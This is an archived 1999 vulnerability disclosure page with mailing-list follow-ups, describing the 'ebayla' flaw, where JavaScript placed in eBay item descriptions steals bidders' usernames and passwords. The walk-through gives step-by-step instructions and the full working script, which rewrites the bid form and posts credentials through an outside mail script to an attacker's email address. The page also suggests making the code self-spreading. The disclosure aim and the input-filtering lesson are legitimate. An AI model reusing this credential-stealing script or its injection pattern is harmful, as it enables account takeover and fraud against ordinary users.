http://www.because-we-can.com/ebayla/

THE EBAYLA BUG AND HOW TO PROTECT YOURSELF

This page describes a security problem that Blue Adept
<http://www.because-we-can.com/>
discovered with eBay's <http://www.ebay.com/> 
on-line auctions on March 31,
1999 (realaudio interview). 
<http://stream.internet.com/Content/inr19990412.ram>
The security hole allows eBay
users to easily steal the passwords of other eBay users.
The exploit involves posting items for bid that include
malicious javascript code as part of the item's description.
When an unsuspecting eBay user places a bid on the
item, the embedded javascript code sends their username
and password to the malicious user by e-mail. From the 
victim's point of view, nothing unusual seems to have
occured, so they are unlikely to report/complain to eBay.

Once a malicious user knows the username/password of the 
victim's eBay account, she can assume full control
of the account, including the ability to: 

create new auctions (automtically charging the victim's account) 
place bids in the victim's name, 
retract legitimate bids in the victim's name, 
change the victim's username/password, barring them from eBay, 
associate bogus negative/positive comments with an arbitrary seller, 
prematurely close an auction being run by the victim. 
insert the ebayla code into the victim's auction.
(The code could be altered to do this automatically, which would 
constitute an ebayla virus). 

The security problem is dangerously easy to take advantage of. A
malicious user needs only to embed the javascript code into their
description of an item for auction. A walk-through of the exploit
demonstrates step-by-step how any user can steal eBay passwords. [1]

Blue Adept notified eBay that a 'huge' potential security problem
existed on March 31,1999 and offered assistance (but as of April 18,
1999 has only received form letter KMM798062C0KM in reply).
Information about the ebayla exploit is being made publicly available to
speed the process of fixing the security hole. 

TRY THE EBAYLA BUG DEMO ON YOURSELF!

Visit a working demonstration of this exploit at eBay! The demo 
works with any javascript-enabled browser, such an Netscape or 
Internet Explorer. Users must register (free) with eBay to place bids.
<http://pages.ebay.com/aw/registration-show.html>

The demo is Blue Adept's own auction infected with eBayla code.
<http://cgi.ebay.com/aw-cgi/eBayISAPI.dll?ViewItem&item=92085423> 
WARNING! When you bid on this item (or even just review your bid 
without placing it), your username and password will automatically 
be mailed back to because-we-can.com.




HOW TO PROTECT YOURSELF

Unfortunately, the potential security issues at eBay are difficult 
to spot and avoid. If you are unfamiliar with spotting suspect 
javascript in the docsource of an html document, the best way to 
protect yourself may be to avoid using eBay until adequate html 
filters have been implemented.

-----------------------------------------------------------------------------

[1] http://www.because-we-can.com/ebayla/walk.htm

THE EBAYLA BUG WALK-THROUGH

This page demonstrates how the ebayla bug can be exploited by someone using minimal resources to steal
usernames and passwords from eBay users. The resources required to launch the attack are minimal and freely
available. The following exploit is written to work with Netscape Communicator only. The goal is to demonstrate
that using only the items listed below, a malicious user can aquire eBay usernames and passwords. (To see a
more efficient (2 line) version of the code that uses a Perl script, visit the the live demo at eBay.)

INGREDIENTS: 

1 Computer with Internet Access 
1 email account 

STEP 1:
Visit ebay.com and register for a free user account. 
<http://pages.ebay.com/aw/registration-show.html>

STEP 2:
Go to the sellers's area to post an item for auction. When asked to enter the description of the item, post the
following description, containing the ebayla code. The first line of the script indicates the email address to which
usernames/passwords are to be sent. 
<http://pages.ebay.com/aw/newitem.html>

1 car, comes with windows.  crashes frequently.  toy.<hr>

WARNING do not bid on this item!! This auction is a demonstration of the 
<a href="http://www.because-we-can.com/ebayla/default.htm">ebayla bug</a>.  
If you place/review a bid, your username and password will be mailed to 
http://www.because-we-can.com.


<script>
recipient = "blue_adept@because-we-can.com";

function printframeset(place_bid, mailUrl, username, password){
  document.open(); 
  document.writeln('<script>');
  document.writeln('function go(){');
  document.writeln('top.b.document.open();');
  document.writeln('top.b.document.writeln("<body onLoad=document.form1.submit()>");');
  document.writeln('top.b.document.writeln("<form name=form1 method=POST action=' + mailUrl + '>");');
  document.writeln('top.b.document.writeln("<input type=hidden name=username value=' + username + '>");');
  document.writeln('top.b.document.writeln("<input type=hidden name=password value=' + password + '>");');
  document.writeln('top.b.document.writeln("</form>")');
  document.writeln('top.b.document.close();');
  document.writeln('}');
  document.writeln('</scr' + 'ipt>');
  document.writeln('</head>');
  document.writeln('<frameset rows="100%,*" onLoad="go()">');
  document.writeln('<frame name="t" src="' + place_bid + '">');
  document.writeln('<frame name="b" src="">');
  document.writeln('</frameset>');
  document.close();
}

function urlEncode(inStr)  {
  outStr=' ';  //not '' for a NS bug!
  for (i=0; i < inStr.length; i++)  {
    aChar=inStr.substring (i, i+1);
    switch(aChar){
      case '%': outStr += "%25"; break; case ',': outStr += "%2C"; break;
      case '/': outStr += "%2F"; break; case ':': outStr += "%3A"; break;
      case '~': outStr += "%7E"; break; case '!': outStr += "%21"; break;
      case '"': outStr += "%22"; break; case '#': outStr += "%23"; break;
      case '$': outStr += "%24"; break; case "'": outStr += "%27"; break;
      case '`': outStr += "%60"; break; case '^': outStr += "%5E"; break;
      case '&': outStr += "%26"; break; case '(': outStr += "%28"; break;
      case ')': outStr += "%29"; break; case '+': outStr += "%2B"; break;
      case '{': outStr += "%7B"; break; case '|': outStr += "%7C"; break;
      case '}': outStr += "%7D"; break; case ';': outStr += "%3B"; break;
      case '<': outStr += "%3C"; break; case '=': outStr += "%3D"; break;
      case '>': outStr += "%3E"; break; case '?': outStr += "%3F"; break;
      case '[': outStr += "%5B"; break; case '\\': outStr += "%5C"; break;
      case ']': outStr += "%5D"; break; case ' ': outStr += "+"; break;
      default: outStr += aChar;
    }
  }
  return outStr.substring(1, outStr.length);
}

function newaction(){
  window.document.forms[0].action="javascript:ebayla()";
}

function ebayla(){
  item = urlEncode(window.document.forms[0].item.value);
  username = urlEncode(window.document.forms[0].userid.value);
  password = urlEncode(window.document.forms[0].pass.value);
  maxbid = urlEncode(window.document.forms[0].maxbid.value);
  
  bid_script = "http://cgi.ebay.com/aw-cgi/eBayISAPI.dll";
  bid_query_string = "?MfcISAPICommand=MakeBid&item=" + item + "&userid=" + username
  + "&pass=" + password + "&maxbid=" + maxbid;
  place_bid = bid_script + bid_query_string;

  mailscript = "http://204.225.88.132/cgi-bin/form1";
  mailUrl = mailscript + '?|' + recipient;
  printframeset(place_bid, mailUrl, username, password);
}

if(document.links[11] != "http://pages.ebay.com/aw/account-status.html"){
  setTimeout("newaction()", 1000);
}

</script>


STEP 4: Wait for users to place/review bids on the item. Shortly afterwards, you will receive an e-mail message
that contains the user's username and password.

Note:
In the exploit described above, the part of the program that does the
actual "dirty-work" of mailing the password and username is a
randomly chosen server-side mailing script we found on the web.
There are many equivalent and publicly available server-side mailing
programs that can be used in it's place.
<http://www.altavista.com/cgi-bin/query?pg=aq&kl=XX&r=%22feedback+form%22+%7C+%22mail+form%22&search=Search&q=&d0=&d1=>

-----------------------------------------------------------------------------

Date: Mon, 19 Apr 1999 14:11:50 -0700
>From: "Epstein, Jeremy" <Jeremy_Epstein@NAI.com>
Subject: Another old-fashioned bug comes back to byte

Wired reports in "'EBayla' Bug Strikes eBay" (see
http://www.wired.com/news/news/technology/story/19207.html) that eBay users
can enter an HTML description of the item being auctioned.  However, the
script provided by the seller can also include Javascript, thus allowing the
seller to create a fairly simple web page that, when accessed by the
unsuspecting bidder, can capture the bidder's eBay username and password and
send it to the bidder (or anyone else).

This is a new version of an old bug: if you allow users to specify input
that can be used by others, make sure there's enough filtering that it can't
be harmful.

Perhaps the scariest part was the reaction from eBay, as reported by Wired:
"EBay's senior director of corporate communications characterized the hole
as an 'occasional byproduct' of the service's user-focused design."  eBay
downplayed the severity of the exploit, noting that "If somebody had indeed
used your password as well as your username and started bidding on a bunch
of items, you'd be the first person to be contacted by eBay through e-mail,
and we'd be able to backtrack on that to make sure that we could take care
of that situation."  

Gee thanks.  After it happens, you'll let me know I just bought a velvet
Elvis and a set of matching pink lawn flamingos :-)

-----------------------------------------------------------------------------

Date: Wed, 21 Apr 1999 17:45:47 -0700
From: Paul Festa <paulf@CNET.COM>
To: BUGTRAQ@netspace.org
Subject: Re: eBay password stealing with JavaScript

They say they won't:

http://www.news.com/News/Item/0,4,35321,00.html

>>>eBay acknowledged that the JavaScript exploit works, but minimized its
importance.

"We know it's there, but you have to put it all in perspective," said eBay
spokesman Kevin Pursglove. "We have a very open environment that lets
individuals describe what they're selling, and JavaScript is there so
people can make the best of their abilities to describe an item."<<<




At 08:30 PM 4/20/99 -0600, Michael K. Sanders wrote:
>Since 'e-commerce' was discussed recently and I didn't find this in
>the archives, may I direct your attention to:
>
><URL:http://because-we-can.com/ebayla/default.htm>
>
>It will be interesting if eBay tries to 'filter' JavaScript from their
>listings to fix this.
>
>
Paul Festa
reporter, CNET News.com
(415) 395-7805 ext. 1313

www.news.com
"Silicon Valley's leading source of up-to-the-minute
information about the technology business." --New York Times

www.cnet.com
"A thing called CNET, which is an industry thing." --Bill Gates